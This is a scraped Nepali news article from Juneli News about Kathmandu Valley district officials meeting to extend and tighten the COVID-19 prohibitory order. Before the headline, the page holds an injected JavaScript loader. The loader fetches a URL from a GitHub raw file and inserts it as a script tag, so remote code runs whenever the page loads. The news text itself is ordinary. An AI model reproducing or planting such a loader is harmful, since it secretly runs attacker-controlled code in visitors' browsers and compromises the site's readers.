;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमान्डौ उपत्यकामा निषेधाज्ञाको अवधि थप गर्ने र यसलाई अझ वैज्ञानिक बनाउने निर्णय – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • काठमान्डौ उपत्यकामा निषेधाज्ञाको अवधि थप गर्ने र यसलाई अझ वैज्ञानिक बनाउने निर्णय
Breaking News

काठमान्डौ उपत्यकामा निषेधाज्ञाको अवधि थप गर्ने र यसलाई अझ वैज्ञानिक बनाउने निर्णय

जुनेली न्यूज, काठमाडौं । कोरोना संक्रमण बढ्दै गएकाले काठमाडौं उपत्यका तीन जिल्ला (काठमाडौं, ललितपुर र भक्तपुर) का प्रमुख जिल्ला अधिकारी (सीडीओ) को संयुक्त बैठक बस्दै छ।

ललितपुरका प्रमुख जिल्ला अधिकारी ढुण्डीप्रसाद निरौलाका अनुसार बैठक आज दिउँसो २ बजेपछि बस्ने तयारी छ।

‘आजको बैठकले निषेधाज्ञाको अवधि थप गर्ने र यसलाई अझ वैज्ञानिक बनाउने निर्णय गर्छ,’ प्रमुख जिल्ला अधिकारी निरौलाले भने, ‘आज साँझसम्म निर्णय सार्वजनिक होला।’

उनका अनुसार वैज्ञानिक बनाउने भनेको कोरोना संक्रमण बढेकाले पहिलेभन्दा केही कडा बनाउने भनिएको हो।

सीसीएसमीको बैठकमा काठमाडौंका प्रमुख जिल्ला अधिकारी कालीप्रसाद पराजुलीले प्रतिनिधित्व गरेको र त्यसअनुसार निषेधाज्ञाको स्वरूप निर्धारण हुने ललितपुरका प्रमुख जिल्ला अधिकारी निरौलाले जानकारी दिए।

यसअघि घोषित निषेधाज्ञाको अवधि भोलि (साउन २७) गतेबाट सकिँदै छ।

कोरोना महामारीको दोस्रो लहर सुरु भएयता गत वैशाख १६ देखि काठमाडौंमा उपत्यकामा जारी निषेधाज्ञाको अवधि पटकपटक थप गरेर साउन २७ गतेसम्म लम्ब्याइएको हो।

फेसबुक प्रतिक्रियाहरु